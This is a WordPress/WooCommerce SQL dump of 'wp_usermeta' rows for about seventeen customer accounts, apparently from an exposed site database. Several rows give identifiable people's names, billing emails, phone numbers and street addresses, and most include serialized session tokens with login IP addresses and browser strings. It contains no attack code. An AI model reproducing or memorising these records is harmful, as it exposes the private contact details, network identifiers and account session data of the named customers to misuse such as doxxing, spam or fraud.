INSERT INTO `wp_usermeta` VALUES (3370, 183, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3371, 183, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3372, 183, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3373, 183, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3374, 183, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3375, 183, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3376, 183, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3377, 183, '_yoast_wpseo_profile_updated', '1479750584'); 
INSERT INTO `wp_usermeta` VALUES (3378, 183, 'session_tokens', 'a:1:{s:64:"ddaaa96a29b24b12e87faf8b5409558ddfcb1956f3970afb2075325dc78c9cdb";a:4:{s:10:"expiration";i:1480960185;s:2:"ip";s:13:"206.197.62.14";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1479750585;}}'); 
INSERT INTO `wp_usermeta` VALUES (3379, 183, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3380, 184, 'nickname', 'adlubeservices'); 
INSERT INTO `wp_usermeta` VALUES (3381, 184, 'first_name', 'Danish'); 
INSERT INTO `wp_usermeta` VALUES (3382, 184, 'last_name', 'Nizami'); 
INSERT INTO `wp_usermeta` VALUES (3383, 184, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3384, 184, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3385, 184, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3386, 184, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3387, 184, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3388, 184, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3389, 184, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3390, 184, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3391, 184, '_yoast_wpseo_profile_updated', '1479793968'); 
INSERT INTO `wp_usermeta` VALUES (3392, 184, 'session_tokens', 'a:1:{s:64:"ec167ef898d7a56075ecef86319286965b532a7a7c0d296d8f18ab82be3a1ee2";a:4:{s:10:"expiration";i:1481003570;s:2:"ip";s:15:"182.185.140.206";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1479793970;}}'); 
INSERT INTO `wp_usermeta` VALUES (3393, 184, 'billing_first_name', 'Danish'); 
INSERT INTO `wp_usermeta` VALUES (3394, 184, 'billing_last_name', 'Nizami'); 
INSERT INTO `wp_usermeta` VALUES (3395, 184, 'billing_company', 'ADLube & Industrial Services'); 
INSERT INTO `wp_usermeta` VALUES (3396, 184, 'billing_email', 'adlubeservices@gmail.com'); 
INSERT INTO `wp_usermeta` VALUES (3397, 184, 'billing_phone', '00923009465453'); 
INSERT INTO `wp_usermeta` VALUES (3398, 184, 'billing_country', 'PK'); 
INSERT INTO `wp_usermeta` VALUES (3399, 184, 'billing_address_1', 'LG-33A Al Latif center main boulevard Gulberg III'); 
INSERT INTO `wp_usermeta` VALUES (3400, 184, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (3401, 184, 'billing_city', 'Lahore'); 
INSERT INTO `wp_usermeta` VALUES (3402, 184, 'billing_state', 'Punjab'); 
INSERT INTO `wp_usermeta` VALUES (3403, 184, 'billing_postcode', '54000'); 
INSERT INTO `wp_usermeta` VALUES (3404, 184, 'last_update', '1479794355'); 
INSERT INTO `wp_usermeta` VALUES (3405, 184, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3406, 185, 'nickname', 'Eric.LamHowYee'); 
INSERT INTO `wp_usermeta` VALUES (3407, 185, 'first_name', 'Eric'); 
INSERT INTO `wp_usermeta` VALUES (3408, 185, 'last_name', 'Lam How Yee'); 
INSERT INTO `wp_usermeta` VALUES (3409, 185, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3410, 185, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3411, 185, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3412, 185, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3413, 185, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3414, 185, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3415, 185, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3416, 185, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3417, 185, '_yoast_wpseo_profile_updated', '1479811570'); 
INSERT INTO `wp_usermeta` VALUES (3418, 185, 'session_tokens', 'a:1:{s:64:"6099d491083db0c21d551e37fe417fdff55d62de7e7d83c8a18ebae95b90842e";a:4:{s:10:"expiration";i:1481021171;s:2:"ip";s:13:"213.78.107.59";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1479811571;}}'); 
INSERT INTO `wp_usermeta` VALUES (3419, 185, 'last_update', '1479811614'); 
INSERT INTO `wp_usermeta` VALUES (3420, 185, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3421, 186, 'nickname', 'stvenot'); 
INSERT INTO `wp_usermeta` VALUES (3422, 186, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3423, 186, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3424, 186, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3425, 186, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3426, 186, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3427, 186, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3428, 186, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3429, 186, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3430, 186, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3431, 186, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3432, 186, '_yoast_wpseo_profile_updated', '1479817165'); 
INSERT INTO `wp_usermeta` VALUES (3433, 186, 'session_tokens', 'a:1:{s:64:"3045cbafb7ce03e0079539a240e7e6cb3ee938067decb4dd11b8d6fe432118fa";a:4:{s:10:"expiration";i:1481026766;s:2:"ip";s:12:"193.57.220.1";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1479817166;}}'); 
INSERT INTO `wp_usermeta` VALUES (3434, 186, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3435, 187, 'nickname', 'zachary.mertens'); 
INSERT INTO `wp_usermeta` VALUES (3436, 187, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3437, 187, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3438, 187, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3439, 187, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3440, 187, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3441, 187, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3442, 187, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3443, 187, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3444, 187, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3445, 187, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3446, 187, '_yoast_wpseo_profile_updated', '1479823163'); 
INSERT INTO `wp_usermeta` VALUES (3447, 187, 'session_tokens', 'a:1:{s:64:"d6d4733e65098b4fd23b26d2b291058f25a399d37f3b36334d9ed70291866b3c";a:4:{s:10:"expiration";i:1501356247;s:2:"ip";s:13:"165.156.39.33";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1501183447;}}'); 
INSERT INTO `wp_usermeta` VALUES (3448, 187, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3449, 188, 'nickname', 'glen'); 
INSERT INTO `wp_usermeta` VALUES (3450, 188, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3451, 188, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3452, 188, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3453, 188, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3454, 188, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3455, 188, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3456, 188, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3457, 188, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3458, 188, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3459, 188, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3460, 188, '_yoast_wpseo_profile_updated', '1479920255'); 
INSERT INTO `wp_usermeta` VALUES (3462, 188, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3463, 189, 'nickname', 'sproulx'); 
INSERT INTO `wp_usermeta` VALUES (3464, 189, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3465, 189, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3466, 189, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3467, 189, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3468, 189, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3469, 189, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3470, 189, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3471, 189, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3472, 189, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3473, 189, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3474, 189, '_yoast_wpseo_profile_updated', '1479950133'); 
INSERT INTO `wp_usermeta` VALUES (3475, 189, 'session_tokens', 'a:1:{s:64:"e5f74c14798cca8ae5d7ef2d9346fc1cee191eb250211f4ebc11a13ec1d977e8";a:4:{s:10:"expiration";i:1481159735;s:2:"ip";s:14:"67.197.213.115";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1479950135;}}'); 
INSERT INTO `wp_usermeta` VALUES (3476, 189, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3477, 190, 'nickname', 'info1'); 
INSERT INTO `wp_usermeta` VALUES (3478, 190, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3479, 190, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3480, 190, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3481, 190, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3482, 190, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3483, 190, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3484, 190, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3485, 190, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3486, 190, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3487, 190, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3488, 190, '_yoast_wpseo_profile_updated', '1479972066'); 
INSERT INTO `wp_usermeta` VALUES (3489, 190, 'session_tokens', 'a:1:{s:64:"9cfb6b5ea57ef70165c33a41a60640ac93b48d0e8442cdfa08a7f14a14da95ba";a:4:{s:10:"expiration";i:1481181667;s:2:"ip";s:14:"115.87.132.115";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1479972067;}}'); 
INSERT INTO `wp_usermeta` VALUES (3490, 191, 'nickname', 'sz7574'); 
INSERT INTO `wp_usermeta` VALUES (3491, 191, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3492, 191, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3493, 191, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3494, 191, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3495, 191, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3496, 191, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3497, 191, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3498, 191, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3499, 191, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3500, 191, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3501, 191, '_yoast_wpseo_profile_updated', '1479988913'); 
INSERT INTO `wp_usermeta` VALUES (3502, 191, 'session_tokens', 'a:3:{s:64:"a3797327015b8ab05a1293df065594518ab6d9cbf9f0f12f8a8cb9d340184e5c";a:4:{s:10:"expiration";i:1481198515;s:2:"ip";s:11:"1.81.78.212";s:2:"ua";s:137:"Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B100 Safari/602.1";s:5:"login";i:1479988915;}s:64:"11e5efd8535699de10783be1605a5d9e89ba03282e020fd85aa974fcaecbd8cf";a:4:{s:10:"expiration";i:1480844661;s:2:"ip";s:15:"113.142.132.211";s:2:"ua";s:116:"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1480671861;}s:64:"efab18e62ed3988889671cf384d4238b99649622f9b9f1412c3b404114a977da";a:4:{s:10:"expiration";i:1480846187;s:2:"ip";s:15:"113.142.132.211";s:2:"ua";s:62:"Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1480673387;}}'); 
INSERT INTO `wp_usermeta` VALUES (3503, 191, 'billing_first_name', 'GVWUJ'); 
INSERT INTO `wp_usermeta` VALUES (3504, 191, 'billing_last_name', 'lihongqin'); 
INSERT INTO `wp_usermeta` VALUES (3505, 191, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (3506, 191, 'billing_email', 'sz7574@sina.com'); 
INSERT INTO `wp_usermeta` VALUES (3507, 191, 'billing_phone', '1-626-575-6002'); 
INSERT INTO `wp_usermeta` VALUES (3508, 191, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (3509, 191, 'billing_address_1', '436 Cloverleaf Dr,ste.933101'); 
INSERT INTO `wp_usermeta` VALUES (3510, 191, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (3511, 191, 'billing_city', 'Baldwin Park'); 
INSERT INTO `wp_usermeta` VALUES (3512, 191, 'billing_state', 'CA'); 
INSERT INTO `wp_usermeta` VALUES (3513, 191, 'billing_postcode', '91706'); 
INSERT INTO `wp_usermeta` VALUES (3514, 191, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3515, 192, 'nickname', 'gvwujlihongqin'); 
INSERT INTO `wp_usermeta` VALUES (3516, 192, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3517, 192, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3518, 192, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3519, 192, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3520, 192, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3521, 192, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3522, 192, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3523, 192, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3524, 192, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3525, 192, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3526, 192, '_yoast_wpseo_profile_updated', '1480154225'); 
INSERT INTO `wp_usermeta` VALUES (3529, 192, 'billing_first_name', 'GVWUJ'); 
INSERT INTO `wp_usermeta` VALUES (3530, 192, 'billing_last_name', 'lihongqin'); 
INSERT INTO `wp_usermeta` VALUES (3531, 192, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (3532, 192, 'billing_email', 'gvwujlihongqin@sina.com'); 
INSERT INTO `wp_usermeta` VALUES (3533, 192, 'billing_phone', '1-626-575-6002'); 
INSERT INTO `wp_usermeta` VALUES (3534, 192, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (3535, 192, 'billing_address_1', '436  Cloverleaf  Dr,ste.933101'); 
INSERT INTO `wp_usermeta` VALUES (3536, 192, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (3537, 192, 'billing_city', 'Baldwin Park'); 
INSERT INTO `wp_usermeta` VALUES (3538, 192, 'billing_state', 'CA'); 
INSERT INTO `wp_usermeta` VALUES (3539, 192, 'billing_postcode', '91706'); 
INSERT INTO `wp_usermeta` VALUES (3540, 192, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3541, 193, 'nickname', 'bumann'); 
INSERT INTO `wp_usermeta` VALUES (3542, 193, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3543, 193, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3544, 193, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3545, 193, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3546, 193, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3547, 193, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3548, 193, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3549, 193, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3550, 193, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3551, 193, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3552, 193, '_yoast_wpseo_profile_updated', '1480183356'); 
INSERT INTO `wp_usermeta` VALUES (3554, 193, 'session_tokens', 'a:1:{s:64:"777f8cffd7e6a9949a2579bd19018408333ec9aaa4cbbfb8c9d014960281845f";a:4:{s:10:"expiration";i:1480357435;s:2:"ip";s:13:"71.55.150.165";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1480184635;}}'); 
INSERT INTO `wp_usermeta` VALUES (3555, 193, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3556, 194, 'nickname', 'andrea.rodrigues'); 
INSERT INTO `wp_usermeta` VALUES (3557, 194, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3558, 194, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3559, 194, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3560, 194, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3561, 194, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3562, 194, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3563, 194, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3564, 194, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3565, 194, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3566, 194, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3567, 194, '_yoast_wpseo_profile_updated', '1480315535'); 
INSERT INTO `wp_usermeta` VALUES (3568, 194, 'session_tokens', 'a:1:{s:64:"745abf8c5a7c0282c73bffccf848042f5aabf01a724e7f1092734e242c89eb68";a:4:{s:10:"expiration";i:1481525137;s:2:"ip";s:14:"91.223.121.149";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1480315537;}}'); 
INSERT INTO `wp_usermeta` VALUES (3569, 194, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3570, 195, 'nickname', 'jholt'); 
INSERT INTO `wp_usermeta` VALUES (3571, 195, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3572, 195, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3573, 195, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3574, 195, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3575, 195, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3576, 195, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3577, 195, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3578, 195, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3579, 195, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3580, 195, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3581, 195, '_yoast_wpseo_profile_updated', '1480339822'); 
INSERT INTO `wp_usermeta` VALUES (3582, 195, 'session_tokens', 'a:1:{s:64:"53c47d6062f5dbc49208c0c84234f9ecd4661cd0dee6505ad23affcc7bef9707";a:4:{s:10:"expiration";i:1481549423;s:2:"ip";s:15:"107.135.200.133";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1480339823;}}'); 
INSERT INTO `wp_usermeta` VALUES (3583, 195, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3584, 196, 'nickname', 'eugene.fuller'); 
INSERT INTO `wp_usermeta` VALUES (3585, 196, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3586, 196, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3587, 196, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3588, 196, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3589, 196, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3590, 196, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3591, 196, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3592, 196, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3593, 196, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3594, 196, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3595, 196, '_yoast_wpseo_profile_updated', '1480341457'); 
INSERT INTO `wp_usermeta` VALUES (3597, 196, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3598, 197, 'nickname', 'david.goldenberg'); 
INSERT INTO `wp_usermeta` VALUES (3599, 197, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3600, 197, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3601, 197, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3602, 197, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3603, 197, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3604, 197, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3605, 197, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3606, 197, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3607, 197, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3608, 197, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3609, 197, '_yoast_wpseo_profile_updated', '1480343892'); 
INSERT INTO `wp_usermeta` VALUES (3610, 197, 'session_tokens', 'a:1:{s:64:"1561d593deefe1b8e7c7307bac851fb6fdf7243af9a2023b96df682902161ff1";a:4:{s:10:"expiration";i:1481553494;s:2:"ip";s:13:"64.202.204.60";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1480343894;}}'); 
INSERT INTO `wp_usermeta` VALUES (3611, 197, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3612, 198, 'nickname', 'g.libanio'); 
INSERT INTO `wp_usermeta` VALUES (3613, 198, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3614, 198, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3615, 198, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3616, 198, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3617, 198, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3618, 198, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3619, 198, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3620, 198, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3621, 198, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3622, 198, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3623, 198, '_yoast_wpseo_profile_updated', '1480355333'); 
INSERT INTO `wp_usermeta` VALUES (3624, 198, 'session_tokens', 'a:1:{s:64:"e1fc55f4d22d77a53b08749829d107a19ae5bd12dd8cf6b22244b53c916083d4";a:4:{s:10:"expiration";i:1490549887;s:2:"ip";s:12:"96.39.11.146";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490377087;}}'); 
INSERT INTO `wp_usermeta` VALUES (3625, 199, 'nickname', 'Burton'); 
INSERT INTO `wp_usermeta` VALUES (3626, 199, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3627, 199, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3628, 199, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3629, 199, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3630, 199, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3631, 199, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3632, 199, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3633, 199, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3634, 199, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3635, 199, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3636, 199, '_yoast_wpseo_profile_updated', '1480362046'); 
INSERT INTO `wp_usermeta` VALUES (3637, 199, 'dismissed_wp_pointers', ''); 
INSERT INTO `wp_usermeta` VALUES (3638, 199, 'wpseo_title', ''); 
